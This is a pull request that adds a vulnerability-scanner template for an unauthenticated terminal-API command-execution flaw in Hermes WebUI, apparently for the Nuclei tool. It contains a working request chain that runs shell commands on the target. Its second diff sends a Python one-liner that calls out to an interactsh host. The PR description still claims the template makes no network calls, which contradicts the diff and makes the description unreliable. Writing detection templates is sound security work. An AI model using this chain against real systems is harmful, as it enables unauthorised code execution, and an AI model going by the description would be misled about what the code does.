### PR TITLE
Add CVE-2026-58123 template

### DIFF
--- a/http/cves/2026/CVE-2026-58123.yaml
+++ b/http/cves/2026/CVE-2026-58123.yaml
@@ -1,0 +1,91 @@
+id: CVE-2026-58123
+
+info:
+  name: Hermes WebUI < 0.51.788 - Unauthenticated Terminal Command Execution
+  author: str4k3r
+  severity: critical
+  description: |
+    Hermes WebUI before 0.51.788 exposes its passwordless embedded-terminal
+    API without an origin check. The template creates a disposable terminal
+    session, starts it, writes only a printf marker followed by exit, and
+    matches that marker in the output. No file is read, no network command is
+    run, and no persistent application data is created.
+  impact: An unauthenticated network client can execute commands as the Hermes WebUI process.
+  remediation: Upgrade Hermes WebUI to 0.51.788 or later, configure authentication, or keep it private.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-58123
+    - https://www.vulncheck.com/advisories/hermes-webui-unauthenticated-rce-via-terminal-api
+    - https://github.com/nesquena/hermes-webui/commit/d257e5f36cfa9328600c8bde6f0de09a6ad9b6f4
+    - https://github.com/nesquena/hermes-webui/releases/tag/v0.51.788
+  classification:
+    cve-id: CVE-2026-58123
+    cwe-id: CWE-306
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: nesquena
+    product: hermes-webui
+    technology: Python, FastAPI, PTY terminal API
+  tags: cve,cve2026,hermes-webui,rce,terminal,unauth
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+  - method: POST
+    path:
+      - '{{BaseURL}}/api/session/new'
+    headers:
+      Content-Type: application/json
+    body: '{}'
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+    extractors:
+      - type: regex
+        name: session_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"session_id"\s*:\s*"([a-f0-9]{12})"'
+
+  - method: POST
+    path:
+      - '{{BaseURL}}/api/terminal/start'
+    headers:
+      Content-Type: application/json
+    body: '{"session_id":"{{session_id}}"}'
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+  - method: POST
+    path:
+      - '{{BaseURL}}/api/terminal/input'
+    headers:
+      Content-Type: application/json
+    body: '{"session_id":"{{session_id}}","data":"printf HERMES_NUCLEI_CHECK; exit\\n"}'
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/terminal/output?session_id={{session_id}}'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - HERMES_NUCLEI_CHECK

--- a/http/cves/2026/CVE-2026-58123.yaml
+++ b/http/cves/2026/CVE-2026-58123.yaml
@@ -1,49 +1,49 @@
 id: CVE-2026-58123
 
 info:
-  name: Hermes WebUI < 0.51.788 - Unauthenticated Terminal Command Execution
+  name: Hermes WebUI < 0.51.788 - Remote Code Execution
   author: str4k3r
   severity: critical
   description: |
-    Hermes WebUI before 0.51.788 exposes its passwordless embedded-terminal
-    API without an origin check. The template creates a disposable terminal
-    session, starts it, writes only a printf marker followed by exit, and
-    matches that marker in the output. No file is read, no network command is
-    run, and no persistent application data is created.
-  impact: An unauthenticated network client can execute commands as the Hermes WebUI process.
-  remediation: Upgrade Hermes WebUI to 0.51.788 or later, configure authentication, or keep it private.
+    Hermes WebUI < 0.51.788 contains an unauthenticated remote code execution caused by improper access control in embedded terminal API endpoints, letting remote attackers execute arbitrary shell commands without credentials.
+  impact: |
+    Remote attackers can execute arbitrary shell commands as the server process user, leading to full system compromise.
+  remediation: |
+    Update to version 0.51.788 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-58123
     - https://www.vulncheck.com/advisories/hermes-webui-unauthenticated-rce-via-terminal-api
     - https://github.com/nesquena/hermes-webui/commit/d257e5f36cfa9328600c8bde6f0de09a6ad9b6f4
     - https://github.com/nesquena/hermes-webui/releases/tag/v0.51.788
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-58123
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-58123
     cwe-id: CWE-306
-    cvss-score: 9.8
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   metadata:
     verified: true
-    max-request: 4
+    max-request: 3
     vendor: nesquena
     product: hermes-webui
-    technology: Python, FastAPI, PTY terminal API
-  tags: cve,cve2026,hermes-webui,rce,terminal,unauth
+  tags: cve,cve2026,hermes-webui,rce,terminal,unauth,oast
 
-flow: http(1) && http(2) && http(3) && http(4)
+flow: http(1) && http(2) && http(3)
 
 http:
-  - method: POST
-    path:
-      - '{{BaseURL}}/api/session/new'
-    headers:
-      Content-Type: application/json
-    body: '{}'
+  - raw:
+      - |
+        POST /api/session/new HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+
     matchers:
       - type: status
         status:
           - 200
         internal: true
+
     extractors:
       - type: regex
         name: session_id
@@ -53,39 +53,35 @@ http:
         regex:
           - '"session_id"\s*:\s*"([a-f0-9]{12})"'
 
-  - method: POST
-    path:
-      - '{{BaseURL}}/api/terminal/start'
-    headers:
-      Content-Type: application/json
-    body: '{"session_id":"{{session_id}}"}'
+  - raw:
+      - |
+        POST /api/terminal/start HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"session_id":"{{session_id}}"}
+
     matchers:
       - type: status
         status:
           - 200
         internal: true
 
-  - method: POST
-    path:
-      - '{{BaseURL}}/api/terminal/input'
-    headers:
-      Content-Type: application/json
-    body: '{"session_id":"{{session_id}}","data":"printf HERMES_NUCLEI_CHECK; exit\\n"}'
-    matchers:
-      - type: status
-        status:
-          - 200
-        internal: true
+  - raw:
+      - |
+        POST /api/terminal/input HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
-  - method: GET
-    path:
-      - '{{BaseURL}}/api/terminal/output?session_id={{session_id}}'
+        {"session_id":"{{session_id}}","data":"python3 -c \"import socket; socket.gethostbyname('{{interactsh-url}}')\"\n"}
+
     matchers-condition: and
     matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
       - type: status
         status:
           - 200
-      - type: word
-        part: body
-        words:
-          - HERMES_NUCLEI_CHECK


### PR DESCRIPTION
## Verification

The template verifies Hermes WebUI's unauthenticated terminal API using only
`printf HERMES_NUCLEI_CHECK; exit`. It does not read files, make network calls, or
leave a persistent command running.